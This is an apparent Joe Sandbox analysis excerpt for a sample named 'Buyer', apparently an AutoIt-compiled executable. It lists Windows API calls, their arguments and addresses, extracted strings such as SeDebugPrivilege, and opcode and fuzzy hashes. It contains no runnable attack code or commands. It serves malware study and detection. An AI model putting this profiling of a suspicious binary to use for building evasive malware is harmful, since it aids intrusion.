                                                                                                    • String ID: SeDebugPrivilege
                                                                                                    • API String ID: 1701285019-2896544425
                                                                                                    • Opcode ID: c1bf84637aa865f6fa4dac2b3a401ba259c85f2c9afbfb5bfe193e4de9a7095c
                                                                                                    • Instruction ID: 32fb67bc1205a06c15366e5bee7319426504c51e01eb3c94fc5cb604da8f02bb
                                                                                                    • Opcode Fuzzy Hash: c1bf84637aa865f6fa4dac2b3a401ba259c85f2c9afbfb5bfe193e4de9a7095c
                                                                                                    • Instruction Fuzzy Hash: F5619F71604206AFD320DF18C996F16BBE1AF4431CF19848CE4568BBA2C779FD45EB92
                                                                                                    APIs
                                                                                                    • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00FD40E3
                                                                                                    • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 00FD40F8
                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00FD4112
                                                                                                    • _wcslen.LIBCMT ref: 00FD4157
                                                                                                    • SendMessageW.USER32(?,00001057,00000000,?), ref: 00FD4184
                                                                                                    • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00FD41B2
                                                                                                    Strings
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$Window_wcslen
                                                                                                    • String ID: SysListView32
                                                                                                    • API String ID: 2147712094-78025650
                                                                                                    • Opcode ID: ecad9543d296a0f2d43256f94a3fae762904fb6b828df23b9e5d63bd7b9cd192
                                                                                                    • Instruction ID: 41275419d1862bccb7ad0a9d0bea46f8b4ae95a88b887e68c0c391da6e74aa89
                                                                                                    • Opcode Fuzzy Hash: ecad9543d296a0f2d43256f94a3fae762904fb6b828df23b9e5d63bd7b9cd192
                                                                                                    • Instruction Fuzzy Hash: 0241C471D00318ABDB219F64CC49BEA7BAAFF48360F140527F944E7281D775AD94DB90
                                                                                                    APIs
                                                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00FAC3FE
                                                                                                    • IsMenu.USER32(00000000), ref: 00FAC41E
                                                                                                    • CreatePopupMenu.USER32 ref: 00FAC454
                                                                                                    • GetMenuItemCount.USER32(01076358), ref: 00FAC4A5
                                                                                                    • InsertMenuItemW.USER32(01076358,?,00000001,00000030), ref: 00FAC4CD
                                                                                                    Strings
                                                                                                    Similarity
                                                                                                    • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                                    • String ID: 0$2
                                                                                                    • API String ID: 93392585-3793063076
                                                                                                    • Opcode ID: ee07a95bd7260d1b8851b27f6e8297993c3ba26a0a6ecc393c33cff304967504
                                                                                                    • Instruction ID: 0182756c3bb7f7bf4a403d7df03e56b0e5bfd7f942c9edcf292a62738b4525a4
                                                                                                    • Opcode Fuzzy Hash: ee07a95bd7260d1b8851b27f6e8297993c3ba26a0a6ecc393c33cff304967504
                                                                                                    • Instruction Fuzzy Hash: BD51D1B1A012059BDF20CF78D894BBEBBF5AF4A324F14411AE905EB291D7709840EBA5
                                                                                                    APIs
                                                                                                    • LoadIconW.USER32(00000000,00007F03), ref: 00FACEF8
                                                                                                    Strings
                                                                                                    Similarity
                                                                                                    • API ID: IconLoad
                                                                                                    • String ID: blank$info$question$stop$warning
                                                                                                    • API String ID: 2457776203-404129466
                                                                                                    • Opcode ID: 2ce09c35a9d4ecf3e0a322869934fb772b1346bda21889b2671566c6276c4b33
                                                                                                    • Instruction ID: 48ed776b01ff5f6914e197c167625550ce868d8decc8a34db9a97bd409e77321
                                                                                                    • Opcode Fuzzy Hash: 2ce09c35a9d4ecf3e0a322869934fb772b1346bda21889b2671566c6276c4b33
                                                                                                    • Instruction Fuzzy Hash: 0A112772A49306BEE7025A159CC2DBF73AC9F067B0F20002AF544AA182EBB87D0061F5
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Similarity
                                                                                                    • API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                                                                    • String ID: 0.0.0.0
                                                                                                    • API String ID: 642191829-3771769585
                                                                                                    • Opcode ID: eeeb1bbc6f3b31b368d874ab42c4f2dd5fbfa837062c257924f23339f57ab83c
                                                                                                    • Instruction ID: 3ca8266a8e4a8d71d1a73e69826729f83971680a5bed7a663c9c2cadce3a4c26
                                                                                                    • Opcode Fuzzy Hash: eeeb1bbc6f3b31b368d874ab42c4f2dd5fbfa837062c257924f23339f57ab83c
                                                                                                    • Instruction Fuzzy Hash: 9C11D6B2D00118AFCB20BB70EC4AEEE77ACDF46724F0401A6F545D6091EF749A81FA61
                                                                                                    APIs
                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00F9E647
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00F9E659
                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00F9E67F
                                                                                                    • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00F9E696
                                                                                                    Strings
                                                                                                    Similarity
                                                                                                    • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                                                                                    • String ID: GetSystemWow64DirectoryW$X64$kernel32.dll
                                                                                                    • API String ID: 582185067-2904798639
                                                                                                    • Opcode ID: f481e6a6bd0f473d5fa483bf912778fc4a9a8420952efe5ba8c011dad2819059
                                                                                                    • Instruction ID: 034b448770dc46601f1cb08ba21283f2f3973a6cbb42163a599676c6a416f40e
                                                                                                    • Opcode Fuzzy Hash: f481e6a6bd0f473d5fa483bf912778fc4a9a8420952efe5ba8c011dad2819059
                                                                                                    • Instruction Fuzzy Hash: 39F0E232C12626ABFB65DB308C48A6A3729BF15B09F0A0156F902E6151EB30DE08FF51
                                                                                                    APIs
                                                                                                      • Part of subcall function 00F59DD1: GetWindowLongW.USER32(00000000,000000EB), ref: 00F59DE2
                                                                                                    • GetSystemMetrics.USER32(0000000F), ref: 00FDA6B3
                                                                                                    • GetSystemMetrics.USER32(0000000F), ref: 00FDA6D3
                                                                                                    • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00FDA910
                                                                                                    • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00FDA92E
                                                                                                    • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00FDA94F
                                                                                                    • ShowWindow.USER32(00000003,00000000), ref: 00FDA96E
                                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00FDA993
                                                                                                    • DefDlgProcW.USER32(?,00000005,?,?), ref: 00FDA9B6
                                                                                                    Similarity
                                                                                                    • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                                                    • String ID:
                                                                                                    • API String ID: 1211466189-0
                                                                                                    • Opcode ID: 609bce8e73cfe236511a73b3696bb1ad80fb0bb5cc648da9f4e4baf29961e07b
                                                                                                    • Instruction ID: a28f2fb5e5c22d81eaf208bcdbfa3880af1244acb749c87717ba19868f7cc03a
                                                                                                    • Opcode Fuzzy Hash: 609bce8e73cfe236511a73b3696bb1ad80fb0bb5cc648da9f4e4baf29961e07b
                                                                                                    • Instruction Fuzzy Hash: 4EB1CD31A00219DFDF14CF28C9957AE7BB2FF44711F09806AEC899B395D734A940EB66
                                                                                                    APIs
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen$LocalTime
                                                                                                    • String ID:
                                                                                                    • API String ID: 952045576-0
                                                                                                    • Opcode ID: 9c97900843e819aab37773ef877de8a197180ce65c40ed46dc1890687c993d5b
                                                                                                    • Instruction ID: 227309bd2f7f3b448b7ea63f300c777f0c86a399e9b19aa3442e90a025f4c048
                                                                                                    • Opcode Fuzzy Hash: 9c97900843e819aab37773ef877de8a197180ce65c40ed46dc1890687c993d5b
                                                                                                    • Instruction Fuzzy Hash: 7E41B3A5D1151476CB11EBF8CC46ACFB7BCAF06310F508462EA08E7221FB39E255D7A5
                                                                                                    APIs
                                                                                                    • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00F82A40,00000004,00000000,00000000), ref: 00F5F611
                                                                                                    • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,00F82A40,00000004,00000000,00000000), ref: 00F9F980
                                                                                                    • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00F82A40,00000004,00000000,00000000), ref: 00F9FA03
                                                                                                    Similarity
                                                                                                    • API ID: ShowWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 1268545403-0
                                                                                                    • Opcode ID: 91de0149d65d5e50c767291e481f64d0eaf4bd009cce862584550b81d90c8c3f
                                                                                                    • Instruction ID: 4bba4036567019aa5c63869863fddd5d4d2b1e0ed11733c5c3bd1047edc12cb7
                                                                                                    • Opcode Fuzzy Hash: 91de0149d65d5e50c767291e481f64d0eaf4bd009cce862584550b81d90c8c3f
                                                                                                    • Instruction Fuzzy Hash: D6411A71E05680AADB399B39CC8C76A7B92AB45322F1444ADFA87C6574C635A88CF710
                                                                                                    APIs
                                                                                                    • DeleteObject.GDI32(00000000), ref: 00FD34D9
                                                                                                    • GetDC.USER32(00000000), ref: 00FD34E1
                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00FD34EC
                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 00FD34F8
                                                                                                    • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00FD3534
                                                                                                    • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00FD3545
                                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00FD6225,?,?,000000FF,00000000,?,000000FF,?), ref: 00FD3580
                                                                                                    • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00FD359F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 3864802216-0
                                                                                                    • Opcode ID: c3324c8961a8738512f199b7c5a0f49c97127967a79c822b37cc5198f6b28242
                                                                                                    • Instruction ID: 03bdc1dafd08828af1e15e07670630d1c166289fedd517025bfeafe7aa56ed22
                                                                                                    • Opcode Fuzzy Hash: c3324c8961a8738512f199b7c5a0f49c97127967a79c822b37cc5198f6b28242
                                                                                                    • Instruction Fuzzy Hash: 6331A072201218BFEB118F24DC49FEB3BAEEF49761F084056FE08DA291D6759D41DBA4
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: NULL Pointer assignment$Not an Object type
                                                                                                    • API String ID: 0-572801152
                                                                                                    • Opcode ID: 2216642838ae050b348d22130b82615d468d6d2535dcb7a1edf3714ae8171292
                                                                                                    • Instruction ID: 2c644003f5a81df3edaaa3021e392fdcc72c2724d48f218d033ae058de7ae251
                                                                                                    • Opcode Fuzzy Hash: 2216642838ae050b348d22130b82615d468d6d2535dcb7a1edf3714ae8171292
                                                                                                    • Instruction Fuzzy Hash: CFD19F71E0060A9FDB10DFA8C982FAEB7B5BF48714F14816DE915AB280E770ED85DB50
                                                                                                    APIs
                                                                                                    • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,00F81B4B,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 00F8191E
                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00F81B4B,00000000,00000000,?,00000000,?,?,?,?), ref: 00F819A1
                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00F81B4B,?,00F81B4B,00000000,00000000,?,00000000,?,?,?,?), ref: 00F81A34
                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00F81B4B,00000000,00000000,?,00000000,?,?,?,?), ref: 00F81A4B
                                                                                                      • Part of subcall function 00F73B70: RtlAllocateHeap.NTDLL(00000000,?,?,?,00F66A59,?,0000015D,?,?,?,?,00F68590,000000FF,00000000,?,?), ref: 00F73BA2
                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00F81B4B,00000000,00000000,?,00000000,?,?,?,?), ref: 00F81AC7
                                                                                                    • __freea.LIBCMT ref: 00F81AF2
                                                                                                    • __freea.LIBCMT ref: 00F81AFE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                                                                    • String ID:
                                                                                                    • API String ID: 2829977744-0
                                                                                                    • Opcode ID: 12492e4a4ada97b7679d4b685e0e6e10151701b51ae3f43ee58350043c5c9771
                                                                                                    • Instruction ID: f8dd2e9b9eabff07d78e7223dcf027785734d550f7e6db92e756bd4d3f9c4cb5
                                                                                                    • Opcode Fuzzy Hash: 12492e4a4ada97b7679d4b685e0e6e10151701b51ae3f43ee58350043c5c9771
                                                                                                    • Instruction Fuzzy Hash: AC919372E012169AEF25AFA4CC91AEE7BADBF09320F144759E805E7140DB39DD42E760
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Variant$ClearInit
                                                                                                    • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                    • API String ID: 2610073882-625585964
                                                                                                    • Opcode ID: cd364cc3ebe8773c5d0ba4404db03efdc93fdb7e39c3799b8fe42bdb1e3ecb20
                                                                                                    • Instruction ID: d38730695b7438f4493f9127f419e5bc4132abba4c2624fff8073ffadd11a58d
                                                                                                    • Opcode Fuzzy Hash: cd364cc3ebe8773c5d0ba4404db03efdc93fdb7e39c3799b8fe42bdb1e3ecb20
                                                                                                    • Instruction Fuzzy Hash: F0919A71E0021AABDF20CFA5C959FAEBBB8BF45724F10815DF515AB280D770A944DBA0
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ObjectSelect$BeginCreatePath
                                                                                                    • String ID:
                                                                                                    • API String ID: 3225163088-0
                                                                                                    • Opcode ID: 6df9268d8b1928f3a4ff29e49f4cf3ed85ae890597397d60bf489afaf636e82c
                                                                                                    • Instruction ID: 0b2215e83c4b1f052159dee9a3c225777465e9a780875b0d61781b5888dcaa71
                                                                                                    • Opcode Fuzzy Hash: 6df9268d8b1928f3a4ff29e49f4cf3ed85ae890597397d60bf489afaf636e82c
                                                                                                    • Instruction Fuzzy Hash: 61915971D04219EFCB14CFA9CC88AEEBBB9FF49320F148146E915B7251D3B8A945DB60
                                                                                                    APIs
                                                                                                    • SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 00FB1945
                                                                                                    • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00FB196D
                                                                                                    • SafeArrayUnaccessData.OLEAUT32(00000001), ref: 00FB1991
                                                                                                    • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00FB19C1
                                                                                                    • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00FB1A48
                                                                                                    • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00FB1AAD
                                                                                                    • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00FB1B19
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                                                                    • String ID:
                                                                                                    • API String ID: 2550207440-0
                                                                                                    • Opcode ID: 196ac5f85f18a0989fa13eaec16c0068125f7b3c329750c0d00dfcf8fde3c769
                                                                                                    • Instruction ID: 964bfc7747cc630d7e7cfe591163f19913ef35bca3cf8a1ce3e857e1e0775728
                                                                                                    • Opcode Fuzzy Hash: 196ac5f85f18a0989fa13eaec16c0068125f7b3c329750c0d00dfcf8fde3c769
                                                                                                    • Instruction Fuzzy Hash: E891E276A00209AFDB01DFA9C8A4BFEB7B8FF45321F548015E911E7291D778A941EF90
                                                                                                    APIs
                                                                                                    • VariantInit.OLEAUT32(?), ref: 00FC40F2
                                                                                                    • CharUpperBuffW.USER32(?,?), ref: 00FC4201
                                                                                                    • _wcslen.LIBCMT ref: 00FC4211
                                                                                                    • VariantClear.OLEAUT32(?), ref: 00FC43A6
                                                                                                      • Part of subcall function 00FB13C8: VariantInit.OLEAUT32(00000000), ref: 00FB1408
                                                                                                      • Part of subcall function 00FB13C8: VariantCopy.OLEAUT32(?,?), ref: 00FB1411
                                                                                                      • Part of subcall function 00FB13C8: VariantClear.OLEAUT32(?), ref: 00FB141D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                                                                    • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                    • API String ID: 4137639002-1221869570
                                                                                                    • Opcode ID: c4115c1bb66af7c7c2357df5710011c4d85415ecb1af3483912847c6326e4bd1
                                                                                                    • Instruction ID: 08a41e3705bb695c1cf560887ad07b4b9f7c9e4139311d523973adf1393902c1
                                                                                                    • Opcode Fuzzy Hash: c4115c1bb66af7c7c2357df5710011c4d85415ecb1af3483912847c6326e4bd1
                                                                                                    • Instruction Fuzzy Hash: 81919C75A083029FC700EF64C991A6ABBE5FF89314F14892DF89987351DB34ED45EB82
                                                                                                    APIs
                                                                                                      • Part of subcall function 00FA0695: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00FA05C8,80070057,?,?,?,00FA09E5), ref: 00FA06B2
                                                                                                      • Part of subcall function 00FA0695: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00FA05C8,80070057,?,?), ref: 00FA06CD
                                                                                                      • Part of subcall function 00FA0695: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00FA05C8,80070057,?,?), ref: 00FA06DB
                                                                                                      • Part of subcall function 00FA0695: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00FA05C8,80070057,?), ref: 00FA06EB
                                                                                                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00FC53D8
                                                                                                    • _wcslen.LIBCMT ref: 00FC54E0
                                                                                                    • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00FC5556
                                                                                                    • CoTaskMemFree.OLE32(?), ref: 00FC5561
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                                                                                    • String ID: NULL Pointer assignment
                                                                                                    • API String ID: 614568839-2785691316
                                                                                                    • Opcode ID: 738606b1c7e205b5fb1a275cc214de845428d47e7614b7519b92354e7d362e1f
                                                                                                    • Instruction ID: afcede07c669842588e5ff86edf7dde9e2a2c190342e8d784503c07c879426fa
                                                                                                    • Opcode Fuzzy Hash: 738606b1c7e205b5fb1a275cc214de845428d47e7614b7519b92354e7d362e1f
                                                                                                    • Instruction Fuzzy Hash: BE913872D002199FDF14DFA4DC91EEEBBB9BF08314F10456AE915A7281DB34AA44DF60
                                                                                                    APIs
                                                                                                    • GetMenu.USER32(?), ref: 00FD293E
                                                                                                    • GetMenuItemCount.USER32(00000000), ref: 00FD2970
                                                                                                    • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00FD2998
                                                                                                    • _wcslen.LIBCMT ref: 00FD29CE
                                                                                                    • GetMenuItemID.USER32(?,?), ref: 00FD2A08
                                                                                                    • GetSubMenu.USER32(?,?), ref: 00FD2A16
                                                                                                      • Part of subcall function 00FA4128: GetWindowThreadProcessId.USER32(?,00000000), ref: 00FA4142
                                                                                                      • Part of subcall function 00FA4128: GetCurrentThreadId.KERNEL32 ref: 00FA4149
                                                                                                      • Part of subcall function 00FA4128: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00FA2C95), ref: 00FA4150
                                                                                                    • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00FD2A9E
                                                                                                      • Part of subcall function 00FAEFBC: Sleep.KERNEL32 ref: 00FAF034
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                                                                    • String ID:
                                                                                                    • API String ID: 4196846111-0
                                                                                                    • Opcode ID: 5b8c599db14d8753319782a9f482a4f4e411c26b6e94e3d970a536d105fb3227
                                                                                                    • Instruction ID: 8a5cb0841749eacce6a67a6c260712404275dcf4c2280e82cccdbcd3cafbed78
                                                                                                    • Opcode Fuzzy Hash: 5b8c599db14d8753319782a9f482a4f4e411c26b6e94e3d970a536d105fb3227
                                                                                                    • Instruction Fuzzy Hash: 00718375E00205AFCB51DF64C841AAEB7F6EF59320F18845AE816EB351DB38ED41EB90
                                                                                                    APIs
                                                                                                    • IsWindow.USER32(010766C8), ref: 00FD8623
                                                                                                    • IsWindowEnabled.USER32(010766C8), ref: 00FD862F
                                                                                                    • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00FD870A
                                                                                                    • SendMessageW.USER32(010766C8,000000B0,?,?), ref: 00FD873D
                                                                                                    • IsDlgButtonChecked.USER32(?,?), ref: 00FD8775
                                                                                                    • GetWindowLongW.USER32(010766C8,000000EC), ref: 00FD8797
                                                                                                    • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00FD87AF
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                                    • String ID:
                                                                                                    • API String ID: 4072528602-0
